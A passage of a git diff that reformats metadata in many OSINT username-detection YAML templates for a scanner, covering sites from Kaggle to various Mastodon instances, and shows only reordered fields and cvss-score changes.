CWE-200 - tags: osint,osint-porn,justforfans metadata: max-request: 1 + tags: osint,osint-porn,justforfans self-contained: true + http: - method: GET path: diff --git a/http/osint/kaggle.yaml b/http/osint/kaggle.yaml index ac0bb9a2d1..3100af9ccd 100644 --- a/http/osint/kaggle.yaml +++ b/http/osint/kaggle.yaml @@ -3,17 +3,18 @@ id: kaggle info: name: Kaggle User Name Information - Detect author: dwisiswant0 - description: Kaggle user name information check was conducted. severity: info + description: Kaggle user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-coding,kaggle metadata: max-request: 1 + tags: osint,osint-coding,kaggle self-contained: true + http: - method: GET path: diff --git a/http/osint/karabin.yaml b/http/osint/karabin.yaml index 5aa867ff69..375f22d766 100644 --- a/http/osint/karabin.yaml +++ b/http/osint/karabin.yaml @@ -3,17 +3,18 @@ id: karabin info: name: Karab.in User Name Information - Detect author: dwisiswant0 - description: Karab.in user name information check was conducted. severity: info + description: Karab.in user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,karabin metadata: max-request: 1 + tags: osint,osint-social,karabin self-contained: true + http: - method: GET path: diff --git a/http/osint/keybase.yaml b/http/osint/keybase.yaml index b518db90ea..1dd5f161ca 100644 --- a/http/osint/keybase.yaml +++ b/http/osint/keybase.yaml @@ -3,17 +3,18 @@ id: keybase info: name: Keybase User Name Information - Detect author: dwisiswant0 - description: Keybase user name information check was conducted. severity: info + description: Keybase user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,keybase metadata: max-request: 1 + tags: osint,osint-social,keybase self-contained: true + http: - method: GET path: diff --git a/http/osint/kickstarter.yaml b/http/osint/kickstarter.yaml index a63290860b..db1cee4227 100644 --- a/http/osint/kickstarter.yaml +++ b/http/osint/kickstarter.yaml @@ -3,17 +3,18 @@ id: kickstarter info: name: Kickstarter User Name Information - Detect author: dwisiswant0 - description: Kickstarter user name information check was conducted. severity: info + description: Kickstarter user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-shopping,kickstarter metadata: max-request: 1 + tags: osint,osint-shopping,kickstarter self-contained: true + http: - method: GET path: diff --git a/http/osint/kik.yaml b/http/osint/kik.yaml index b7abbbf499..f9467b5649 100644 --- a/http/osint/kik.yaml +++ b/http/osint/kik.yaml @@ -3,17 +3,18 @@ id: kik info: name: Kik User Name Information - Detect author: dwisiswant0 - description: Kik user name information check was conducted. severity: info + description: Kik user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,kik metadata: max-request: 1 + tags: osint,osint-social,kik self-contained: true + http: - method: GET path: diff --git a/http/osint/kipin.yaml b/http/osint/kipin.yaml index eda29fae55..16f27f59b0 100644 --- a/http/osint/kipin.yaml +++ b/http/osint/kipin.yaml @@ -3,17 +3,18 @@ id: kipin info: name: Kipin User Name Information - Detect author: dwisiswant0 - description: Kipin user name information check was conducted. severity: info + description: Kipin user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-business,kipin metadata: max-request: 1 + tags: osint,osint-business,kipin self-contained: true + http: - method: GET path: diff --git a/http/osint/knowyourmeme.yaml b/http/osint/knowyourmeme.yaml index 023b0ddb87..0181132fd5 100644 --- a/http/osint/knowyourmeme.yaml +++ b/http/osint/knowyourmeme.yaml @@ -3,17 +3,18 @@ id: knowyourmeme info: name: KnowYourMeme User Name Information - Detect author: dwisiswant0 - description: KnowYourMeme user name information check was conducted. severity: info + description: KnowYourMeme user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,knowyourmeme metadata: max-request: 1 + tags: osint,osint-social,knowyourmeme self-contained: true + http: - method: GET path: diff --git a/http/osint/ko-fi.yaml b/http/osint/ko-fi.yaml index b6d2810e35..a3714aeba4 100644 --- a/http/osint/ko-fi.yaml +++ b/http/osint/ko-fi.yaml @@ -3,17 +3,18 @@ id: ko-fi info: name: Ko-Fi User Name Information - Detect author: dwisiswant0 - description: Ko-Fi user name information check was conducted. severity: info + description: Ko-Fi user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,ko-fi metadata: max-request: 1 + tags: osint,osint-social,ko-fi self-contained: true + http: - method: GET path: diff --git a/http/osint/kongregate.yaml b/http/osint/kongregate.yaml index 2986cc1f7c..38135719da 100644 --- a/http/osint/kongregate.yaml +++ b/http/osint/kongregate.yaml @@ -3,17 +3,18 @@ id: kongregate info: name: Kongregate User Name Information - Detect author: dwisiswant0 - description: Kongregate user name information check was conducted. severity: info + description: Kongregate user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,kongregate metadata: max-request: 1 + tags: osint,osint-gaming,kongregate self-contained: true + http: - method: GET path: diff --git a/http/osint/kotburger.yaml b/http/osint/kotburger.yaml index a28a24df15..5926d03829 100644 --- a/http/osint/kotburger.yaml +++ b/http/osint/kotburger.yaml @@ -3,17 +3,18 @@ id: kotburger info: name: Kotburger User Name Information - Detect author: dwisiswant0 - description: Kotburger user name information check was conducted. severity: info + description: Kotburger user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-images,kotburger metadata: max-request: 1 + tags: osint,osint-images,kotburger self-contained: true + http: - method: GET path: diff --git a/http/osint/kwejkpl.yaml b/http/osint/kwejkpl.yaml index 461b9fa8ae..28b8ac5104 100644 --- a/http/osint/kwejkpl.yaml +++ b/http/osint/kwejkpl.yaml @@ -3,17 +3,18 @@ id: kwejkpl info: name: Kwejk.pl User Name Information - Detect author: dwisiswant0 - description: Kwejk.pl user name information check was conducted. severity: info + description: Kwejk.pl user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-images,kwejkpl metadata: max-request: 1 + tags: osint,osint-images,kwejkpl self-contained: true + http: - method: GET path: diff --git a/http/osint/librarything.yaml b/http/osint/librarything.yaml index 8b97af8890..3cccf5a281 100644 --- a/http/osint/librarything.yaml +++ b/http/osint/librarything.yaml @@ -3,17 +3,18 @@ id: librarything info: name: LibraryThing User Name Information - Detect author: dwisiswant0 - description: LibraryThing user name information check was conducted. severity: info + description: LibraryThing user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,librarything metadata: max-request: 1 + tags: osint,osint-hobby,librarything self-contained: true + http: - method: GET path: diff --git a/http/osint/libretoothgr-mastodon-instance.yaml b/http/osint/libretoothgr-mastodon-instance.yaml index 012189763d..1a5184f540 100644 --- a/http/osint/libretoothgr-mastodon-instance.yaml +++ b/http/osint/libretoothgr-mastodon-instance.yaml @@ -3,17 +3,18 @@ id: libretoothgr-mastodon-instance info: name: Libretooth.gr (Mastodon Instance) User Name Information - Detect author: dwisiswant0 - description: Libretooth.gr (Mastodon Instance) user name information check was conducted. severity: info + description: Libretooth.gr (Mastodon Instance) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,libretoothgr-mastodon-instance metadata: max-request: 1 + tags: osint,osint-social,libretoothgr-mastodon-instance self-contained: true + http: - method: GET path: diff --git a/http/osint/lichess.yaml b/http/osint/lichess.yaml index 0b18c70983..be36205d93 100644 --- a/http/osint/lichess.yaml +++ b/http/osint/lichess.yaml @@ -3,17 +3,18 @@ id: lichess info: name: Lichess User Name Information - Detect author: dwisiswant0 - description: Lichess user name information check was conducted. severity: info + description: Lichess user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,lichess metadata: max-request: 1 + tags: osint,osint-gaming,lichess self-contained: true + http: - method: GET path: diff --git a/http/osint/likeevideo.yaml b/http/osint/likeevideo.yaml index 8e539349eb..40f7548991 100644 --- a/http/osint/likeevideo.yaml +++ b/http/osint/likeevideo.yaml @@ -3,17 +3,18 @@ id: likeevideo info: name: Likeevideo User Name Information - Detect author: dwisiswant0 - description: Likeevideo user name information check was conducted. severity: info + description: Likeevideo user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,likeevideo metadata: max-request: 1 + tags: osint,osint-social,likeevideo self-contained: true + http: - method: GET path: diff --git a/http/osint/line.yaml b/http/osint/line.yaml index aad347759c..494be43b47 100644 --- a/http/osint/line.yaml +++ b/http/osint/line.yaml @@ -3,17 +3,18 @@ id: line info: name: LINE User Name Information - Detect author: dwisiswant0 - description: LINE user name information check was conducted. severity: info + description: LINE user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,line metadata: max-request: 1 + tags: osint,osint-social,line self-contained: true + http: - method: GET path: diff --git a/http/osint/linktree.yaml b/http/osint/linktree.yaml index bbbbbdd21f..730b0ccf90 100644 --- a/http/osint/linktree.yaml +++ b/http/osint/linktree.yaml @@ -3,17 +3,18 @@ id: linktree info: name: Linktree User Name Information - Detect author: dwisiswant0 - description: Linktree user name information check was conducted. severity: info + description: Linktree user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,linktree metadata: max-request: 1 + tags: osint,osint-social,linktree self-contained: true + http: - method: GET path: diff --git a/http/osint/linuxorgru.yaml b/http/osint/linuxorgru.yaml index e3bc0f801e..7e1d0d7282 100644 --- a/http/osint/linuxorgru.yaml +++ b/http/osint/linuxorgru.yaml @@ -3,17 +3,18 @@ id: linuxorgru info: name: Linux.org.ru User Name Information - Detect author: dwisiswant0 - description: Linux.org.ru user name information check was conducted. severity: info + description: Linux.org.ru user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-tech,linuxorgru metadata: max-request: 1 + tags: osint,osint-tech,linuxorgru self-contained: true + http: - method: GET path: diff --git a/http/osint/litmindclub-mastodon-instance.yaml b/http/osint/litmindclub-mastodon-instance.yaml index 7b58551581..9549b9edb5 100644 --- a/http/osint/litmindclub-mastodon-instance.yaml +++ b/http/osint/litmindclub-mastodon-instance.yaml @@ -3,17 +3,18 @@ id: litmindclub-mastodon-instance info: name: Litmind.club (Mastodon Instance) User Name Information - Detect author: dwisiswant0 - description: Litmind.club (Mastodon Instance) user name information check was conducted. severity: info + description: Litmind.club (Mastodon Instance) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,litmindclub-mastodon-instance metadata: max-request: 1 + tags: osint,osint-social,litmindclub-mastodon-instance self-contained: true + http: - method: GET path: diff --git a/http/osint/livejournal.yaml b/http/osint/livejournal.yaml index b1f46ff428..d0402a2abf 100644 --- a/http/osint/livejournal.yaml +++ b/http/osint/livejournal.yaml @@ -3,17 +3,18 @@ id: livejournal info: name: Livejournal User Name Information - Detect author: dwisiswant0 - description: Livejournal user name information check was conducted. severity: info + description: Livejournal user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-blog,livejournal metadata: max-request: 1 + tags: osint,osint-blog,livejournal self-contained: true + http: - method: GET path: diff --git a/http/osint/livemasterru.yaml b/http/osint/livemasterru.yaml index 379aa93c56..ce4a35cb1f 100644 --- a/http/osint/livemasterru.yaml +++ b/http/osint/livemasterru.yaml @@ -3,17 +3,18 @@ id: livemasterru info: name: Livemaster.ru User Name Information - Detect author: dwisiswant0 - description: Livemaster.ru user name information check was conducted. severity: info + description: Livemaster.ru user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-shopping,livemasterru metadata: max-request: 1 + tags: osint,osint-shopping,livemasterru self-contained: true + http: - method: GET path: diff --git a/http/osint/lobsters.yaml b/http/osint/lobsters.yaml index f6089d1d73..039377168a 100644 --- a/http/osint/lobsters.yaml +++ b/http/osint/lobsters.yaml @@ -3,17 +3,18 @@ id: lobsters info: name: Lobste.rs User Name Information - Detect author: dwisiswant0 - description: Lobste.rs user name information check was conducted. severity: info + description: Lobste.rs user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-tech,lobsters metadata: max-request: 1 + tags: osint,osint-tech,lobsters self-contained: true + http: - method: GET path: diff --git a/http/osint/lorsh-mastodon-instance.yaml b/http/osint/lorsh-mastodon-instance.yaml index e7a2cd8560..25f9e410d6 100644 --- a/http/osint/lorsh-mastodon-instance.yaml +++ b/http/osint/lorsh-mastodon-instance.yaml @@ -3,17 +3,18 @@ id: lorsh-mastodon-instance info: name: Lor.sh (Mastodon Instance) User Name Information - Detect author: dwisiswant0 - description: Lor.sh (Mastodon Instance) user name information check was conducted. severity: info + description: Lor.sh (Mastodon Instance) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,lorsh-mastodon-instance metadata: max-request: 1 + tags: osint,osint-social,lorsh-mastodon-instance self-contained: true + http: - method: GET path: diff --git a/http/osint/love-ru.yaml b/http/osint/love-ru.yaml index bfc53170fa..c954774ebe 100644 --- a/http/osint/love-ru.yaml +++ b/http/osint/love-ru.yaml @@ -3,17 +3,18 @@ id: love-ru info: name: Love ru User Name Information - Detect author: dwisiswant0 - description: Love ru user name information check was conducted. severity: info + description: Love ru user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,love-ru metadata: max-request: 1 + tags: osint,osint-social,love-ru self-contained: true + http: - method: GET path: diff --git a/http/osint/lowcygierpl.yaml b/http/osint/lowcygierpl.yaml index b9103955a7..94a708b9c2 100644 --- a/http/osint/lowcygierpl.yaml +++ b/http/osint/lowcygierpl.yaml @@ -3,17 +3,18 @@ id: lowcygierpl info: name: Lowcygier.pl User Name Information - Detect author: dwisiswant0 - description: Lowcygier.pl user name information check was conducted. severity: info + description: Lowcygier.pl user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,lowcygierpl metadata: max-request: 1 + tags: osint,osint-gaming,lowcygierpl self-contained: true + http: - method: GET path: diff --git a/http/osint/maga-chat.yaml b/http/osint/maga-chat.yaml index 5a3166f283..135079ff3a 100644 --- a/http/osint/maga-chat.yaml +++ b/http/osint/maga-chat.yaml @@ -3,17 +3,18 @@ id: maga-chat info: name: MAGA-CHAT User Name Information - Detect author: dwisiswant0 - description: MAGA-CHAT user name information check was conducted. severity: info + description: MAGA-CHAT user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,maga-chat metadata: max-request: 1 + tags: osint,osint-social,maga-chat self-contained: true + http: - method: GET path: diff --git a/http/osint/magabook.yaml b/http/osint/magabook.yaml index 613abf1642..92749469ed 100644 --- a/http/osint/magabook.yaml +++ b/http/osint/magabook.yaml @@ -3,17 +3,18 @@ id: magabook info: name: MAGABOOK User Name Information - Detect author: dwisiswant0 - description: MAGABOOK user name information check was conducted. severity: info + description: MAGABOOK user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,magabook metadata: max-request: 1 + tags: osint,osint-social,magabook self-contained: true + http: - method: GET path: diff --git a/http/osint/magix.yaml b/http/osint/magix.yaml index 1cb0e38dd5..ba4c6075a7 100644 --- a/http/osint/magix.yaml +++ b/http/osint/magix.yaml @@ -3,17 +3,18 @@ id: magix info: name: Magix User Name Information - Detect author: dwisiswant0 - description: Magix user name information check was conducted. severity: info + description: Magix user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-music,magix metadata: max-request: 1 + tags: osint,osint-music,magix self-contained: true + http: - method: GET path: diff --git a/http/osint/mail-archive.yaml b/http/osint/mail-archive.yaml index 1e7a5bd99c..da25e67003 100644 --- a/http/osint/mail-archive.yaml +++ b/http/osint/mail-archive.yaml @@ -11,6 +11,7 @@ info: metadata: max-request: 1 tags: osint,osint-coding,maillist + http: - method: GET path: diff --git a/http/osint/manyvids.yaml b/http/osint/manyvids.yaml index 6fdb99fb1e..4c9d369754 100644 --- a/http/osint/manyvids.yaml +++ b/http/osint/manyvids.yaml @@ -3,17 +3,18 @@ id: manyvids info: name: MANYVIDS User Name Information - Detect author: dwisiswant0 - description: MANYVIDS user name information check was conducted. severity: info + description: MANYVIDS user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,manyvids metadata: max-request: 1 + tags: osint,osint-porn,manyvids self-contained: true + http: - method: GET path: diff --git a/http/osint/mapmytracks.yaml b/http/osint/mapmytracks.yaml index cf34bbf9be..64c7ac009d 100644 --- a/http/osint/mapmytracks.yaml +++ b/http/osint/mapmytracks.yaml @@ -3,17 +3,18 @@ id: mapmytracks info: name: MapMyTracks User Name Information - Detect author: dwisiswant0 - description: MapMyTracks user name information check was conducted. severity: info + description: MapMyTracks user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-health,mapmytracks metadata: max-request: 1 + tags: osint,osint-health,mapmytracks self-contained: true + http: - method: GET path: diff --git a/http/osint/mapstodonspace-mastodon-instance.yaml b/http/osint/mapstodonspace-mastodon-instance.yaml index c88c3e39fe..ed73be770c 100644 --- a/http/osint/mapstodonspace-mastodon-instance.yaml +++ b/http/osint/mapstodonspace-mastodon-instance.yaml @@ -3,17 +3,18 @@ id: mapstodonspace-mastodon-instance info: name: Mapstodon.space (Mastodon Instance) User Name Information - Detect author: dwisiswant0 - description: Mapstodon.space (Mastodon Instance) user name information check was conducted. severity: info + description: Mapstodon.space (Mastodon Instance) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,mapstodonspace-mastodon-instance metadata: max-request: 1 + tags: osint,osint-social,mapstodonspace-mastodon-instance self-contained: true + http: - method: GET path: diff --git a/http/osint/maroc-nl.yaml b/http/osint/maroc-nl.yaml index a9f0a7b5f3..d0c0b318c1 100644 --- a/http/osint/maroc-nl.yaml +++ b/http/osint/maroc-nl.yaml @@ -3,17 +3,18 @@ id: maroc-nl info: name: Maroc nl User Name Information - Detect author: dwisiswant0 - description: Maroc nl user name information check was conducted. severity: info + description: Maroc nl user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,maroc-nl metadata: max-request: 1 + tags: osint,osint-social,maroc-nl self-contained: true + http: - method: GET path: diff --git a/http/osint/marshmallow.yaml b/http/osint/marshmallow.yaml index 33ce6061d9..0fb0858eb2 100644 --- a/http/osint/marshmallow.yaml +++ b/http/osint/marshmallow.yaml @@ -3,17 +3,18 @@ id: marshmallow info: name: Marshmallow User Name Information - Detect author: dwisiswant0 - description: Marshmallow user name information check was conducted. severity: info + description: Marshmallow user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,marshmallow metadata: max-request: 1 + tags: osint,osint-social,marshmallow self-contained: true + http: - method: GET path: diff --git a/http/osint/martech.yaml b/http/osint/martech.yaml index 8e9ec98c1e..c66b95ec86 100644 --- a/http/osint/martech.yaml +++ b/http/osint/martech.yaml @@ -3,17 +3,18 @@ id: martech info: name: Martech User Name Information - Detect author: dwisiswant0 - description: Martech user name information check was conducted. severity: info + description: Martech user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-business,martech metadata: max-request: 1 + tags: osint,osint-business,martech self-contained: true + http: - method: GET path: diff --git a/http/osint/massage-anywhere.yaml b/http/osint/massage-anywhere.yaml index a988308e7a..52fa702b64 100644 --- a/http/osint/massage-anywhere.yaml +++ b/http/osint/massage-anywhere.yaml @@ -3,17 +3,18 @@ id: massage-anywhere info: name: Massage Anywhere User Name Information - Detect author: dwisiswant0 - description: Massage Anywhere user name information check was conducted. severity: info + description: Massage Anywhere user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-health,massage-anywhere metadata: max-request: 1 + tags: osint,osint-health,massage-anywhere self-contained: true + http: - method: GET path: diff --git a/http/osint/mastoai.yaml b/http/osint/mastoai.yaml index dbbcfb9aab..6a879c725f 100644 --- a/http/osint/mastoai.yaml +++ b/http/osint/mastoai.yaml @@ -3,17 +3,18 @@ id: mastoai info: name: Masto.ai User Name Information - Detect author: dwisiswant0 - description: Masto.ai user name information check was conducted. severity: info + description: Masto.ai user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,mastoai metadata: max-request: 1 + tags: osint,osint-social,mastoai self-contained: true + http: - method: GET path: diff --git a/http/osint/mastodon-101010pl.yaml b/http/osint/mastodon-101010pl.yaml index 47b04db383..8a83075098 100644 --- a/http/osint/mastodon-101010pl.yaml +++ b/http/osint/mastodon-101010pl.yaml @@ -3,17 +3,18 @@ id: mastodon-101010pl info: name: Mastodon-101010.pl User Name Information - Detect author: dwisiswant0 - description: Mastodon-101010.pl user name information check was conducted. severity: info + description: Mastodon-101010.pl user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,mastodon-101010pl metadata: max-request: 1 + tags: osint,osint-social,mastodon-101010pl self-contained: true + http: - method: GET path: diff --git a/http/osint/mastodon-api.yaml b/http/osint/mastodon-api.yaml index 93cfb65b74..d1b8a6e54c 100644 --- a/http/osint/mastodon-api.yaml +++ b/http/osint/mastodon-api.yaml @@ -3,17 +3,18 @@ id: mastodon-api info: name: Mastodon-API User Name Information - Detect author: dwisiswant0 - description: Mastodon-API user name information check was conducted. severity: info + description: Mastodon-API user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,mastodon-api metadata: max-request: 1 + tags: osint,osint-social,mastodon-api self-contained: true + http: - method: GET path: diff --git a/http/osint/mastodon-chaossocial.yaml b/http/osint/mastodon-chaossocial.yaml index 157382bfe8..92cbc5cfd0 100644 --- a/http/osint/mastodon-chaossocial.yaml +++ b/http/osint/mastodon-chaossocial.yaml @@ -3,17 +3,18 @@ id: mastodon-chaossocial info: name: Mastodon-Chaos.social User Name Information - Detect author: dwisiswant0 - description: Mastodon-Chaos.social user name information check was conducted. severity: info + description: Mastodon-Chaos.social user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,mastodon-chaossocial metadata: max-request: 1 + tags: osint,osint-social,mastodon-chaossocial self-contained: true + http: - method: GET path: diff --git a/http/osint/mastodon-climatejusticerocks.yaml b/http/osint/mastodon-climatejusticerocks.yaml index ae8cdfb63a..023068198a 100644 --- a/http/osint/mastodon-climatejusticerocks.yaml +++ b/http/osint/mastodon-climatejusticerocks.yaml @@ -3,17 +3,18 @@ id: mastodon-climatejusticerocks info: name: Mastodon-climatejustice.rocks User Name Information - Detect author: dwisiswant0 - description: Mastodon-climatejustice.rocks user name information check was conducted. severity: info + description: Mastodon-climatejustice.rocks user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,mastodon-climatejusticerocks metadata: max-request: 1 + tags: osint,osint-social,mastodon-climatejusticerocks self-contained: true + http: - method: GET path: diff --git a/http/osint/mastodon-countersocial.yaml b/http/osint/mastodon-countersocial.yaml index 681cb1347b..264056abff 100644 --- a/http/osint/mastodon-countersocial.yaml +++ b/http/osint/mastodon-countersocial.yaml @@ -3,17 +3,18 @@ id: mastodon-countersocial info: name: Mastodon-counter.social User Name Information - Detect author: dwisiswant0 - description: Mastodon-counter.social user name information check was conducted. severity: info + description: Mastodon-counter.social user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,mastodon-countersocial metadata: max-request: 1 + tags: osint,osint-social,mastodon-countersocial self-contained: true + http: - method: GET path: diff --git a/http/osint/mastodon-defcon.yaml b/http/osint/mastodon-defcon.yaml index be151480cc..8a9b48169b 100644 --- a/http/osint/mastodon-defcon.yaml +++ b/http/osint/mastodon-defcon.yaml @@ -3,17 +3,18 @@ id: mastodon-defcon info: name: Mastodon-Defcon User Name Information - Detect author: dwisiswant0 - description: Mastodon-Defcon user name information check was conducted. severity: info + description: Mastodon-Defcon user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,mastodon-defcon metadata: max-request: 1 + tags: osint,osint-social,mastodon-defcon self-contained: true + http: - method: GET path: diff --git a/http/osint/mastodon-eu-voice.yaml b/http/osint/mastodon-eu-voice.yaml index b0233e0d9f..cc08d1abfc 100644 --- a/http/osint/mastodon-eu-voice.yaml +++ b/http/osint/mastodon-eu-voice.yaml @@ -3,17 +3,18 @@ id: mastodon-eu-voice info: name: Mastodon-EU Voice User Name Information - Detect author: dwisiswant0 - description: Mastodon-EU Voice user name information check was conducted. severity: info + description: Mastodon-EU Voice user name information check was conducted. classification: cvss-metrics: 